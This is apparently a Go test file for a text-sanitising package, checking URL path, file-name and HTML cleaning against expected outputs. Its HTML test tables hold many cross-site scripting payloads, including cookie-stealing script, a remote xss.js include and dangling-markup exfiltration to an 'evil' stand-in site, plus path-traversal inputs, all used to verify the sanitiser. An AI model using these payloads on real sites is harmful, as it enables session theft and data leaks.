1// Utility functions for working with text 2package sanitize 3 4import ( 5 "testing" 6) 7 8var Format = "\ninput: %q\nexpected: %q\noutput: %q" 9 10type Test struct { 11 input string 12 expected string 13} 14 15// NB the treatment of accents - they are removed and replaced with ascii transliterations 16var urls = []Test{ 17 {"ReAd ME.md", `read-me.md`}, 18 {"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`}, 19 {"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`}, 20 {"/../../4-icon.jpg", `/4-icon.jpg`}, 21 {"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`}, 22 {"../4 icon.*", `/4-icon.`}, 23 {"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`}, 24 {"../*", `/`}, 25} 26 27func TestPath(t *testing.T) { 28 for _, test := range urls { 29 output := Path(test.input) 30 if output != test.expected { 31 t.Fatalf(Format, test.input, test.expected, output) 32 } 33 } 34} 35 36func BenchmarkPath(b *testing.B) { 37 for i := 0; i < b.N; i++ { 38 for _, test := range urls { 39 output := Path(test.input) 40 if output != test.expected { 41 b.Fatalf(Format, test.input, test.expected, output) 42 } 43 } 44 } 45} 46 47var fileNames = []Test{ 48 {"ReAd ME.md", `read-me.md`}, 49 {"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`}, 50 {"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`}, 51 {"/../../4-icon.jpg", `4-icon.jpg`}, 52 {"/Images/../4-icon.jpg", `4-icon.jpg`}, 53 {"../4 icon.jpg", `4-icon.jpg`}, 54 {"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`}, 55} 56 57func TestName(t *testing.T) { 58 for _, test := range fileNames { 59 output := Name(test.input) 60 if output != test.expected { 61 t.Fatalf(Format, test.input, test.expected, output) 62 } 63 } 64} 65 66func BenchmarkName(b *testing.B) { 67 for i := 0; i < b.N; i++ { 68 for _, test := range fileNames { 69 output := Name(test.input) 70 if output != test.expected { 71 b.Fatalf(Format, test.input, test.expected, output) 72 } 73 } 74 } 75} 76 77var baseFileNames = []Test{ 78 {"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`}, 79 {"/../../4-iCoN.jpg", `-4-iCoN-jpg`}, 80 {"And/Or", `And-Or`}, 81 {"Sonic.EXE", `Sonic-EXE`}, 82 {"012: #Fetch for Defaults", `012-Fetch-for-Defaults`}, 83} 84 85func TestBaseName(t *testing.T) { 86 for _, test := range baseFileNames { 87 output := BaseName(test.input) 88 if output != test.expected { 89 t.Fatalf(Format, test.input, test.expected, output) 90 } 91 } 92} 93 94// Test with some malformed or malicious html 95// NB because we remove all tokens after a < until the next > 96// and do not attempt to parse, we should be safe from invalid html, 97// but will sometimes completely empty the string if we have invalid input 98// Note we sometimes use " in order to keep things on one line and use the ` character 99var htmlTests = []Test{ 100 {` `, " "}, 101 {`&#x000D;`, `&#x000D;`}, 102 {`<invalid attr="invalid"<,<p><p><p><p><p>`, ``}, 103 {"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."}, 104 {`FOO
ZOO`, "FOO\rZOO"}, 105 {`<script><!--<script </s`, ``}, 106 {`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`}, 107 {`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`}, 108 {`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"}, 109 {`Something<br/>Some more`, "Something\nSome more"}, 110 {`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""}, 111 {`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`}, 112 {`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`}, 113 {`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`}, 114 {`<iframe src="" attr="">>>>>>`, `<iframe src="" attr="">`}, 115 {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`}, 116 {`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``}, 117 {`<IMG SRC=JaVaScRiPt:alert('XSS')>`, ``}, 118 {`<IMG SRC="javascript:alert('XSS')" <test`, ``}, 119 {`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``}, 120 {`> & test <`, `> & test <`}, 121 {`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``}, 122 {`“hello” it’s for ‘real’`, `"hello" it's for 'real'`}, 123 {`<IMG SRC=javascript:a& 124#0000108ert('XSS')>`, ``}, 125 {`'';!--"<XSS>=&{()}`, `'';!--"=&{()}`}, 126 {"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"}, 127 128 // Examples from https://githubengineering.com/githubs-post-csp-journey/ 129 {`<img src='https://example.com/log_csrf?html=`, ``}, 130 {`<img src='https://example.com/log_csrf?html= 131<form action="https://example.com/account/public_keys/19023812091023"> 132... 133<input type="hidden" name="csrf_token" value="some_csrf_token_value"> 134</form>`, `...`}, 135 {`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f 136 <p>secret</p>`, `secret 137`}, 138 {`<form action="https://some-evil-site.com"><button>Click</button><textarea name=' 139<!-- </textarea> --><!-- '" --> 140<form action="/logout"> 141 <input name="authenticity_token" type="hidden" value="secret1"> 142</form>`, `Click -- `}, 143} 144 145func TestHTML(t *testing.T) { 146 for _, test := range htmlTests { 147 output := HTML(test.input) 148 if output != test.expected { 149 t.Fatalf(Format, test.input, test.expected, output) 150 } 151 } 152} 153 154var htmlTestsAllowing = []Test{ 155 {`<IMG SRC="jav
ascript:alert('XSS');">`, `<img>`}, 156 {`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`}, 157 {`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`}, 158 {`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`}, 159 {`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`}, 160 {`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`}, 161 {`<b>hello world</b>`, `<b>hello world</b>`}, 162 {`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`}, 163 {`&#x000D;`, `&#x000D;`}, 164 {`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`}, 165 {"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."}, 166 {"`FOO
ZOO", "`FOO ZOO"}, 167 {`<script><!--<script </s`, ``}, 168 {`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`}, 169 {"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?> or <p id=\"0</p\"> or <<><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>"}, 170 {`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`}, 171 {"Something<br/>Some more", `Something<br/>Some more`}, 172 {`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a 'test' of <b>bold</b> & <i>italic</i></a> <br/> invalid markup.`}, 173 {"<sender ignore=me>John Smith</sender>", `John Smith`}, 174 {"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`}, 175 {"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``}, 176 {`<iframe src="" attr="">`, `<iframe src="" attr="">`}, 177 {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>">`}, 178 {`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`}, 179 {`<IMG SRC=JaVaScRiPt:alert('XSS')>`, ``}, 180 {`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>>> `}, 181 {`> & test <`, `> & test <`}, 182 {`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`}, 183 {`<img src="data:text/javascript;alert('alert');">`, `<img>`}, 184 {`<iframe src=http://... <`, ``}, 185 {`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``}, 186 {`<img src=javascript:alert(document.cookie)>`, `<img>`}, 187 {`<?php echo('hello world')>`, ``}, 188 {`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`}, 189 {`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`}, 190 {`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`, 191 `<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`}, 192 {`<a href="javascript:alert('XSS1')" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup');">XSS<a>`}, 193 {`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write("UNTRUSTED INPUT: " + document.location.hash); >`}, 194 {`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`}, 195 {`<IMG SRC=javascript:alert('XSS')>`, `<img>`}, 196 {`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`}, 197 {`<IMG SRC="jav	ascript:alert('XSS');">`, `<img>`}, 198 {`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`}, 199 {`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC="http://ha.ckers.org/xss.js">`}, 200 {`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`}, 201 {`'';!--"<XSS>=&{()}`, `'';!--"=&{()}`}, 202 {`<IMG SRC=javascript:alert('XSS')`, ``}, 203 {`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>">`}, 204 {`<IMG SRC=javascript:a& 205#0000108ert('XSS')>`, `<img>`}, 206} 207 208func TestHTMLAllowed(t *testing.T) { 209 210 for _, test := range htmlTestsAllowing { 211 output, err := HTMLAllowing(test.input) 212 if err != nil { 213 t.Fatalf(Format, test.input, test.expected, output, err) 214 } 215 if output != test.expected { 216 t.Fatalf(Format, test.input, test.expected, output) 217 } 218 } 219} 220 221func BenchmarkHTMLAllowed(b *testing.B) { 222 for i := 0; i < b.N; i++ { 223 for _, test := range htmlTestsAllowing { 224 output, err := HTMLAllowing(test.input) 225 if err != nil { 226 b.Fatalf(Format, test.input, test.expected, output, err) 227 } 228 if output != test.expected { 229 b.Fatalf(Format, test.input, test.expected, output) 230 } 231 } 232 } 233} 234